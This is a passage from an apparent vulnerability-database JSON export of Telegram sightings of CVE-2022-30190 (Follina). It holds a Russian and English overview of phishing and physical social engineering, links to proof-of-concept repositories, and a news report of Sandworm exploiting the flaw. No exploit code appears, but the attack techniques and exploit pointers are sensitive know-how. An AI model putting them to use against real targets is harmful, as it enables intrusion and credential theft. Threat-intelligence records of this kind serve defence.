\u041f\u0440\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u043f\u0440\u0438\u0432\u0435\u0434\u0443 \u0432 \u043f\u0440\u0438\u043c\u0435\u0440 \u0447\u0442\u043e \u043d\u0438\u0442\u044c \u043d\u043e\u0432\u0435\u043d\u044c\u043a\u043e\u0435 \u0442\u0430\u043a\u043e\u0435 \u043f\u0435\u0447\u0430\u043b\u044c\u043d\u043e \u0438\u0437\u0432\u0441\u0442\u043d\u0430\u044f CVE-2022-30190 \u043d\u0430 \u043d\u0435\u0435 \u0435\u0441\u0442\u044c \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u044b -  \u0442\u044b\u043a .\n\u0427\u0442\u043e \u043e\u043d\u0430 \u0434\u0435\u043b\u0430\u0435\u0442?  \n\u042d\u0442\u0430  \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 MS Office.\n\u041a\u043e\u0433\u0434\u0430 \u0447\u0442\u043e-\u0442\u043e \u0438\u0434\u0435\u0442 \u043d\u0435 \u0442\u0430\u043a \u0441 Windows \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0437\u044b\u0432\u0430\u0442\u044c \u0438\u0437 \u0434\u0440\u0443\u0433\u0438\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0447\u0435\u0440\u0435\u0437 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 URL-\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b MSDT. 
\n\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f, \u0432\u044b\u0437\u0432\u0430\u0432\u0448\u0435\u0433\u043e MSDT, \u0442\u043e \u0435\u0441\u0442\u044c \u0432 \u043d\u0430\u0448\u0435\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043e\u0442\u043a\u0440\u044b\u0432\u0448\u0435\u0433\u043e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b.\n\u041f\u043e\u0434\u043e\u0431\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \n\n\u0415\u0449\u0435 \u0434\u043b\u044f \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u043f\u043e\u0434\u0434\u0435\u043b\u044c\u043d\u044b\u0435 \u0432\u0435\u0431 \u0441\u0430\u0439\u0442\u044b . \n\u042d\u0442\u043e \u0442\u043e\u0436\u0435 \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u0432\u0435\u0441\u044c\u043c\u0430 \u043f\u0440\u043e\u0441\u0442\u043e . 
\n\u0415\u0441\u0442\u044c \u0444\u0438\u0448\u0438\u043d\u0433 \u043a\u043e\u0433\u0434\u0430 \u0445\u0430\u043a\u0435\u0440 \u0443\u0436\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u044c\u0441\u044f \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0438 \u0435\u043c\u0443 \u043d\u0443\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u043f\u0443\u0441\u0442\u0438\u043c \u043f\u0430\u0440\u043e\u043b\u0438 \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 . \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u044e\u0437\u0430\u044e\u0442 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 \u0434\u043e\u0441 \u0430\u0442\u0430\u043a\u0438 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e pyersinia \u0447\u0442\u043e\u0431\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432\u044b \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043b\u043e\u0441\u044c, \u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0433 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0438\u0442\u044c \u0432\u0432\u0435\u0434\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 . 
\n\u0412\u043e\u0442 \u0441\u0430\u0442\u044c\u044f \u043f\u0440\u043e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u0434\u0430\u043d\u043d\u044b\u0445 \u0447\u0435\u0440\u0435\u0437 wireshark \n\n\u0422\u0435\u043f\u0435\u0440\u044c \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043e\u0431 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 , \u0433\u0434\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0434\u043e\u043b\u0436\u0435\u043d \"\u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c\" .\n\u041f\u0435\u0440\u0432\u043e\u0435, \u0447\u0442\u043e \u043f\u0440\u043e\u0445\u043e\u0434\u0438 \u0432 \u0433\u043e\u043b\u043e\u0432\u0443 \u044d\u0442\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u044f \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 .  \u041a\u0430\u043a \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f \"\u0441\u0430\u043c\u043e\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0435 \u0437\u0432\u0435\u043d\u043e \u0432 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u044d\u0442\u043e \u0443\u0431\u043e\u0440\u0449\u0438\u0446\u0430\" - \u041f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e \u043e\u043d\u0430 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u0442 \u0432 \u043a\u043e\u043c\u043f\u0430\u0445 , \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u043b\u0430\u0442\u0438\u0442\u044c \u0435\u0439 \u0438 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u0442\u044c \u0432\u0441\u0442\u0430\u0432\u0438\u0442\u044c \u0444\u043b\u0435\u0448\u043a\u0443\ud83e\udda0  \u0418\u043b\u0438 \u043f\u043e\u043c\u043d\u0438\u0442\u0435 \u043a\u0430\u043a \u0434\u0435\u043b\u0430\u043b\u0438 \u043b\u0430\u043f\u0441\u0443\u0441 
(\u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u043f\u0440\u043e\u0441\u0438\u043b\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u043d\u0438\u043c\u0438 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u0447\u0430\u0442\u044c ) . \n\u0415\u0449\u0435 \u0435\u0441\u043b\u0438 \u0443\u0436 \u043d\u0438\u043a\u043e\u0433\u043e \u0438\u0437 \u043d\u0435 \u0432\u044b\u0448\u043b\u043e \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u0442\u044c , \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441\u0430\u043c\u043e\u043c\u0443 . \u0414\u043b\u044f \u0442\u0430\u043a\u043e\u0433\u043e \u0445\u0430\u043a\u0435\u0440 \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0442\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438, \u0438\u043b\u0438 \u044f \u0433\u0434\u0435-\u0442\u043e \u0432\u0438\u0434\u0435\u043b\u0430 \u0447\u0442\u043e \u043e\u043d\u0438 \u0440\u043e\u044e\u0442\u0441\u044f \u0432 \u043e\u0444\u0438\u0441\u043d\u044b\u0445 \u043c\u0443\u0441\u043e\u0440\u043d\u044b\u0445 \u0431\u0430\u043a\u0430\u0445(\u043d\u0438\u0447\u0435\u0433\u043e \u0441\u043c\u0435\u0448\u043d\u043e\u0433\u043e \u043a\u0442\u043e-\u0442\u043e \u0442\u0443\u0434\u0430 \u0432\u044b\u043a\u0438\u0434\u044b\u0432\u0430\u0435\u0442 \u043f\u0430\u0440\u043e\u043b\u0438)  , \u0435\u0449\u0435 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443, \u0434\u043b\u044f \u0442\u043e\u0433\u043e \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u0432 \u0437\u0434\u0430\u043d\u0438\u0435 
\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u043f\u0440\u043e\u0441\u0442\u043e \u0443\u0432\u0435\u0440\u0435\u043d\u043d\u043e \u0438\u0434\u0442\u0438 \u0437\u0430 \u043a\u0435\u043c \u0442\u043e.\n\u0412\u043e\u043e\u0431\u0449\u0435 \u0435\u0441\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u0441\u0442\u0440\u043e\u0433\u0438\u0435 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u043c\u0435\u0441\u0442\u0430 , \u0442\u0430\u043c \u043e\u043d\u0438 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u044e\u0442 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u0438\u043b\u0438 \u043f\u0440\u043e\u0432\u043e\u0434\u044f\u0442 \u0434\u0440\u0443\u0433\u0438\u0435 \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0438\u043c\u0435\u043d\u043d\u043e \u0441 \u043d\u0438\u043c\u0438 ..\n\u041d\u0435\u043c\u043d\u043e\u0433\u043e \u0437\u0430\u0442\u0440\u043e\u043d\u0443 \u043a\u0430\u043a \u0441 \u044d\u0442\u0438\u043c \u0431\u043e\u0440\u043e\u0442\u044c\u0441\u044f .\n\u0412 \u043f\u0435\u0440\u0432\u0443\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0431\u044b\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u0431\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 , \u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u0441 \u0440\u0430\u0431\u043e\u0447\u0435\u0433\u043e \u043f\u043a \u043a\u0430\u043a\u0438\u0435-\u043b\u0438\u0431\u043e \u0441\u0432\u043e\u0438 \u043f\u0438\u0441\u044c\u043c\u0430 \u043d\u0430 email  \u0441 \u043d\u0435\u0437\u043d\u0430\u043a\u043e\u043c\u044b\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 , \u043d\u0435 \u043f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0430\u043c , \u0447\u0430\u0449\u0435 
\u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u0435\u0442\u044c \u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043d\u0430 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439, \u0438 \u0432\u043e\u043e\u0431\u0449\u0435 \u0431\u043e\u043b\u0435\u0435 \u0431\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u044c\u0441\u044f \u043a\u043e \u0432\u0441\u0435\u043c\u0443 .  \u041d\u0430\u0441\u0447\u0435\u0442 \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0432\u0438\u0434\u0430: \u043a\u0430\u043a \u0438\u0437\u0431\u0435\u0436\u0430\u0442\u044c \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 , \u043d\u0443 \u044d\u0442\u043e \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u043b\u043e\u0436\u043d\u044b\u0439 \u0432\u043e\u043f\u0440\u043e\u0441 - \u043d\u0430\u0432\u0435\u0440\u043d\u043e\u0435 \u0441\u0442\u043e\u0438\u0442 \u0447\u0430\u0449\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 . \u0412\u043e\u043e\u0431\u0449\u0435 \u0442\u0435\u043c\u0430 \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 \u0434\u043e\u0432\u043e\u043b\u044c\u043d\u043e \u043e\u0431\u0448\u0438\u0440\u043d\u0430 \u0438 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u043c\u043d\u043e\u0433\u0438\u0435 \u0441\u0444\u0435\u0440\u044b \u0436\u0438\u0437\u043d\u0438  ,\u041d\u041e \u044f \u0434\u0443\u043c\u0430\u044e \u043a\u043e\u0440\u043e\u0442\u043a\u043e \u0432\u044b \u043f\u043e\u043d\u044f\u043b\u0438. 
\u0415\u0441\u043b\u0438 \u0447\u0442\u043e  \u044f \u043f\u0440\u0438\u043a\u0440\u0435\u043f\u043b\u044e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u0442\u0435\u0439 \u043f\u0440\u043e \u043c\u0435\u0442\u043e\u0434\u044b \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0438 \u043d\u0438\u0436\u0435 . \n\u0410 \u0442\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u043f\u0435\u0440\u0435\u0439\u0442\u0438 \u043a \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0447\u0430\u0441\u0442\u0438 .\n#virus #social_engineering", "creation_timestamp": "2022-09-24T08:34:34.000000Z"}, {"uuid": "3a110461-749a-4367-9669-e2e68114e013", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/3636", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aProof of concept for CVE-2022-30190 (Follina).\nURL\uff1ahttps://github.com/winstxnhdw/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-12-26T21:47:18.000000Z"}, {"uuid": "3a804d2b-9449-46de-b35f-68e7548527d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2521", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThese are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)\nURL\uff1ahttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": 
"2022-06-16T20:50:32.000000Z"}, {"uuid": "6b0f248c-ef93-4c21-b455-013c26c08b84", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/technical_private_cat/191", "content": "Part 1 - social engineering\n\nFirst I want to talk about social engineering. \nWhat is social engineering? \nIt is methods of influencing a person to do what you want him to do. \n\nBut what methods hackers use and what tools and resources do they use? \n\nThe first and most famous type I want to talk about is phishing. \nFor me phishing is divided into two types - mass and targeted (those who knows can correct). \n\"Bulk phishing\" is a kind of mass general delivery of let's say emails with malicious files, links, threat notifications etc. with some kind of general concept.  \n\nAnd directed is phishing, which is aimed at a particular person - for example, deputy director of the company. To do so, phishers first use methods a la OSINT to collect information about a target and then they compose phishing attacks.  \nTo hide an exe in any other format they use different file joyners or work with asm exe files themselves. Then they make up a more or less convincing story or just send it to the victim(s). Another example about sending documents is the infamous CVE-2022-30190, which contains exploits, see.\nWhat does it do?  \nThis vulnerability can be exploited via a malicious MS Office document.\nWhen something goes wrong with Windows it can invoke from other applications via a special MSDT URL protocol. \nIf the vulnerability is exploited successfully, the attacker can run arbitrary code with the privileges of the application that invoked MSDT, i.e. in our case with the privileges of the user who opened the malicious file.\nSimilar vulnerability and exploit \n\nPhishing can also be done via fake websites. \nThis is also very easy to do. 
\nThere are phishing attempts when a hacker is already in the local network and needs to get passwords to log on to the server and download the malware. For this, most often a local attack using local dos attacks for example with pyersinia to the victim device is restarted, and the attacker could intercept the data entered. \nHere is a wireshark article about data hijacking \n\nNow let's talk about social engineering where the intruder must be \"present\".\nThe first thing that comes to mind is the compromise of the employees.  As they say \"the most vulnerable part of the server is the cleaner\" - Because she does not know anything about computers, the intruder can pay her and ask to insert a flash drive\ud83e\udda0 Or remember what Lapsus did (directly asking companies' employees to cooperate with them) . \nIf no one from the company could be compromised or hacked, the attacker has to act himself. For this, a hacker can pretend to be an employee of the company, or I've seen somewhere that they dig in the office trash (no joke, someone throws out passwords there), or, for example, to get into the company building, they can just confidently walk in behind someone else.\nIn general, where the security of the premises is more stringent, they are more likely to compromise employees or conduct other manipulations with them ...\nA few words on how to deal with it.\nFirst of all be more vigilant, do not open any e-mails from unknown addresses, do not click on links, check the company network for suspicious activity more often, and in general be more vigilant about everything.  Concerning the second type: how to avoid compromise, well this is a very difficult question - probably check the employees more often. In general the topic of social engineering is quite vast and affects many areas of life, BUT I think you got the gist. If anything, I'll attach a few articles about social engineering methods below. 
\nAnd then you can move on to the next part.\n #virus #social_engineering", "creation_timestamp": "2022-09-24T08:33:34.000000Z"}, {"uuid": "b0c09fb6-555b-4216-bab9-346ba17d1049", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/JqVwQ-JC9B9ph46qq_gs1KPvHPPLX-_sQPp9do9RGc2keWM", "content": "", "creation_timestamp": "2026-04-10T21:00:05.000000Z"}, {"uuid": "27040cbf-7dbd-4570-9998-122d29149439", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/8wPJR4Zrqe1NVpmz6R4R-oJOE4FmewBY2nxE00bK5aCo0SE", "content": "", "creation_timestamp": "2025-10-18T19:00:11.000000Z"}, {"uuid": "a79ef736-c40a-4873-aed8-160fc4fb8943", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/ZHsH8l_PJf6qA-LG3pwKoQfrYnUBM4bmr6171DkIh35gCrQ", "content": "", "creation_timestamp": "2025-10-18T21:00:05.000000Z"}, {"uuid": "1ae98914-a449-460f-be44-61fd4f13aaf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/825", "content": "\u200b\ud83c\udde8\ud83c\uddf3 \u0425\u0430\u043a\u0435\u0440\u044b Sandworm \u0430\u0442\u0430\u043a\u0443\u044e\u0442 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418 \u0447\u0435\u0440\u0435\u0437 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina.\n\n\ud83d\udcac \u041f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u0430\u044f 
\u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043d\u044b\u0435 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u044b \u0423\u043a\u0440\u0430\u0438\u043d\u044b \u0443\u0437\u043d\u0430\u043b\u0430 \u043e \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438: \u0445\u0430\u043a\u0435\u0440\u044b \u0438\u0437 \u0420\u043e\u0441\u0441\u0438\u0438 \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u044e\u0442 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u043c \u0421\u041c\u0418 (\u0440\u0430\u0434\u0438\u043e\u0441\u0442\u0430\u043d\u0446\u0438\u044f\u043c, \u0433\u0430\u0437\u0435\u0442\u0430\u043c, \u043d\u043e\u0432\u043e\u0441\u0442\u043d\u044b\u043c \u0430\u0433\u0435\u043d\u0442\u0441\u0442\u0432\u0430\u043c \u0438 \u043f\u0440.). 
\u0412 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 CERT-UA \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0441\u0432\u044b\u0448\u0435 500 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u041f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0442\u0435\u043c\u043e\u0439 \u00ab\u0421\u043f\u0438\u0441\u043e\u043a \u0441\u0441\u044b\u043b\u043e\u043a \u043d\u0430 \u0438\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u043a\u0430\u0440\u0442\u044b\u00bb \u0440\u0430\u0441\u0441\u044b\u043b\u0430\u044e\u0442\u0441\u044f \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u044f\u0449\u0438\u043a\u043e\u0432 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0439. 
\u0412 \u043d\u0438\u0445 \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442\u0441\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 \u00ab\u0421\u041f\u0418\u0421\u041e\u041a\u043f\u043e\u0441\u0438\u043b\u0430\u043d\u044c\u043d\u0430\u0456\u043d\u0442\u0435\u0440\u0430\u043a\u0442\u0438\u0432\u043d\u0456\u043a\u0430\u0440\u0442\u0438.docx\u00bb, \u043f\u043e\u0441\u043b\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u044f \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u0435\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f HTML-\u0444\u0430\u0439\u043b \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f JavaScript-\u043a\u043e\u0434, \u0432 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u044e\u0449\u0438\u0439 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0449\u0438\u0439 EXE-\u0444\u0430\u0439\u043b 2.txt. \u042d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043a\u0430\u043a \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e CrescentImp.\n\n\u0412 \u0445\u043e\u0434\u0435 \u0430\u0442\u0430\u043a\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u0432 \u0443\u0442\u0438\u043b\u0438\u0442\u0435 \u0434\u0438\u0430\u0433\u043d\u043e\u0441\u0442\u0438\u043a\u0438 Microsoft Windows Support Diagnostic Tool (MSDT), \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0443\u044e \u043a\u0430\u043a Follina. 
